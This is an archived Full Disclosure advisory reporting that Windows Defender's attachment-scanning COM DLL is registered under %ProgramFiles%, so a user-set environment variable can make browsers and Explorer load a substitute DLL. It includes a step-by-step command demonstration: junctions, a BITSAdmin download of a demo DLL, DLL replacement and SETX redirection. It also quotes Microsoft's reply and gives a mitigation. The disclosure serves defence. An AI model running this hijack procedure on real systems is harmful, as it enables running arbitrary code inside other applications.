lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <E63884DA37844225A50AE1F2BCEC087E@H270>
Date: Fri, 27 Mar 2020 18:23:49 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 65): unsafe,
	easy to rediect paths all over

Hi @ll,

Microsoft still registers LOTS of DLLs (which implement COM classes,
cryptography service providers, services etc.) as well as command lines
with paths containing the (pre-defined) environment variables %windir%,
%SystemRoot%, %ProgramFiles%, %CommonProgramFiles%, %ProgramFiles(x86)%
and %CommonProgramFiles(x86)%.

For example, Windows Defender shipped with Windows Vista and newer versions
of Windows, installs a COM class which implements the IOfficeAntiVirus
interface (see <https://msdn.microsoft.com/en-us/library/ms537369.aspx>).

| REG.exe QUERY HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE} /S
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}
|     (Standard)    REG_SZ    Windows Defender IOfficeAntiVirus implementation
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts
|     (Standard)    REG_SZ    Scanned Hosting Applications
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw
|     (Standard)    REG_SZ    IAttachmentExecute
|     Enable    REG_DWORD    0x1
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon
|     (Standard)    REG_SZ    ActiveX controls
|     Enable    REG_DWORD    0x1
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
|
| HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32
|     (Standard)    REG_EXPAND_SZ    %ProgramFiles%\Windows Defender\MpOav.dll
                                     ~~~~~~~~~~~~~~ here there be dragons!
|     ThreadingModel    REG_SZ    Both

This COM interface is called from the attachment manager (see
<https://support.microsoft.com/en-us/help/883260/information-about-the-attachment-manager-in-microsoft-windows>)
The attachment manager in turn is called from file explorer, web browsers,
mail/news clients, instant messengers, etc. whenever a user opens/executes
a file downloaded from the Internet, i.e. a file that carries the
"mark of the web", stores a downloaded file, saves a web page or an
attachment.


Since (system) environment variables set in a user's profile obscur
(system) environment variables with the same name set for the machine,
unprivileged users can redirect all those paths containing environment
variables and execute arbitrary (rogue or malicious) DLLs and programs
instead of the intended DLLs and programs!


Demonstration:
~~~~~~~~~~~~~~

On a 32-bit (x86) or 64-bit (x64) installation of Windows Vista or any
newer version, except Windows 10 with KB4052623 installed, perform the
following steps:

0. Log on to an arbitrary (unprivileged) user account and start the
   command processor %COMSPEC% alias %SystemRoot%\System32\CMD.exe.

1. Create a directory "Rogue Program Files\" in the root directory of the
   Windows drive, copy the directory "%ProgramFiles%\Windows Defender\"
   with its contents into the empty new directory, then create reparse
   points (junctions) to all other subdirectories of the "%ProgramFiles%\"
   directory in the new directory:

   MKDIR "%SystemDrive%\Rogue Program Files"
   XCOPY.exe "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
   FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%?"

2. On 64-bit installations, additionally create a directory
   "Rogue Program Files (x86)\" in the root directory of the Windows
   drive, copy the directory "%ProgramFiles(x86)%\Windows Defender\"
   with its contents into the empty new directory, then create
   reparse points (junctions) to all other subdirectories of the
   "%ProgramFiles(x86)%\" directory in the new directory:

   MKDIR "%SystemDrive%\Rogue Program Files (x86)"
   XCOPY.exe "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
   FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%?"

3. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.CAB>
   and save it in your "%TEMP%" directory:

   BITSAdmin.exe /TRANSFER dummy /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB
"%TEMP%\SENTINEL.CAB"

   See <https://skanthak.homepage.t-online.de/sentinel.html> and/or
   <https://skanthak.homepage.t-online.de/minesweeper.html> for the
   description/documentation of SENTINEL.DLL

4. Extract SENTINEL.DLL for both architectures/bitnesses (x86: 32-bit;
   x64: 64-bit) into your "%TEMP%" directory:

   EXPAND.exe "%TEMP%\SENTINEL.CAB" /F:* "%TEMP%"

5.a. On 32-bit installations, copy the 32-bit SENTINEL.DLL over
     "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll":

   COPY /Y "%TEMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll"

5.b. On 64-bit installations, copy the 64-bit SENTINEL.DLL over
     "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll"
     and the 32-bit SENTINEL.DLL over
     "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll":

   COPY /Y "%TEMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll"
   COPY /Y "%TEMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll"

6. Set the environment variable "ProgramFiles" to the directory
   created in step 1:

   SETX.exe ProgramFiles "%SystemDrive%\Rogue Program Files"

7. On 64-bit installations, additionally set the environment variable
   "ProgramFiles(x86)" to the directory created in step 2:

   SETX.exe ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"

8. Download an arbitrary file with your web browser, for example
   <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>,
   or save an attachment in your mail client:

   START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
   "%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
   "%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE

   Instead of "C:\Program Files\Windows Defender\MpOav.dll" and
   "C:\Program Files (x86)\Windows Defender\MpOav.dll" this calls
   "%SystemDrive%\Rogue Program Files\Windows Defender\MpOav.dll" and
   "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOav.dll",
   which display message boxes with informations about their caller!


NOTE: the batch script
      <https://skanthak.homepage.t-online.de/download/DEFENDER.CMD>
      performs all these steps on 32-bit and 64-bit installations of
      Windows Vista and newer versions of Windows.


Vendor statement:
~~~~~~~~~~~~~~~~~

The MSRC assigned case 57439 to the above report, and replied with the
following statements:

| After investigation, our engineers have determine this this behavior
| is by-design and does not constitute as a vulnerability as reported.

OUCH!
I recommend to teach these "engineers" the difference between a pathname
registered as "%ProgramFiles%\...\<filename>.<extension>" and a pathname
registered as "C:\Program Files\...\<filename>.<extension>"!

HINT: the second variant does NOT allow to load and execute an ARBITRARY
      DLL via an environment variable set by the user!

The observed behaviour is therefore NOT by-design, but due to CARELESS
implementation by CLUELESS developers.

| For an attacker to do as the report indicates, they would already
| need to have gained sufficient control over the victim's system to
| change the ProgramFiles environment variable for the process that
| is instantiating this COM class. This highlights local code execution.
|
| Additionally, our design to get AV to load in a utility process
| greatly reduces the attack surface of this scenario.

OUCH²!
The attack surface is but provided by Windows Defender: its POOR
implementation (see above) allows this attack in the first place.
And there is no utility process started here: the attacker controlled
DLL is loaded and executed ih the processes which want to call AV,
instead of the DLL installed with Windows Defender, preventing exactly
the intended call of the AV's utility process and defeating your design!

| Utility processes are also more restricted than the browser process
| generally so this is another win in addition to the process decoupling.

OUCH³!
There is NO decoupled process involved!
The demonstration runs an arbitrary DLL in the process of a web browser,
a mail/news client, an instant messenger and file explorer, with the
credentials of the current user, UNRESTRICTED.

| As such, we are closing this case.


Mitigation:
~~~~~~~~~~~

Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>


stay tuned, and far away from Microsoft's UNSAFE products!
Stefan Kanthak


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ